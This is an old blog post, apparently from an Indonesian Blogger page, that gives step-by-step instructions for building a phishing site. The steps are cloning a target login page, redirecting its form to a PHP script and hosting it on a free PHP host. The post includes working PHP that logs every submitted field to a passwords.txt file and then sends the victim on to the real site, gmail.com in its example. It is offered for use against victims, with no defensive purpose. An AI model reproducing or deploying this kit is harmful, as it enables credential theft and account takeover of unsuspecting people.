Pilih Warna Latar


About Me In Facebook

Pages

6.13.2011

Phishing Guide- In Detail

Make Your Own Phishing Site:

If you are tired Of Searching For Those Phishing Files

How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps



[Image: Go_down.GIF]

1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.

2. When You Found Your Site Right Click On It And Say "view source" And Save It On Desktop As index.html

3. Open The "index.htm" With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action="RANDOM URL" method="post"


4.Change The Link After Word Action To "write.php" And Change The Word "Post" To "Get", Which Is Close To The Word Method

Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page

5. Save index.html

6. Time To Create A Free Website. It MUST SUPPORT .php Files So I Suggest The Use Of http://www.110mb.com. Create A Free Website.

This Is Just An Example You Can Find Much More php Supported Sites

7. Login To Your Website And Go To "file manager"

8. Delete The File Thats Already There Called "index.htm" And Upload Your "index.htm" (The One You Just Made)

9. Create A New File Called "write.php" And Copy / Paste This:

Code:
<?php
header("Location: http://random");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


10. Switch Out The Word "RANDOM" With The Site The Browser Should Go To After Victim Wrote His/Her Password. So It Should Say Like This:

("Location: http://gmail.com ");

You Might Want To Change The Textfile Name So Others Wont Be Able To View The File.

11. Save This File write.php, And Upload It To The Sub domain as well

12. Test Out Your Website. Type In Something In Your Phisher And Then Go To File manager And Open The Password File, What You Wrote Should Be Typed Here!,

ENJOY!!!!

 

0 komentar:

:10 :11 :12 :13
:14 :15 :16 :17
:18 :19 :20 :21
:22 :23 :24 :25
:26 :27 :28 :29
:30 :31 :32 :33
:34 :35 :36 :37
:38 :39 :40 :41
:42 :43 :44 :45

Posting Komentar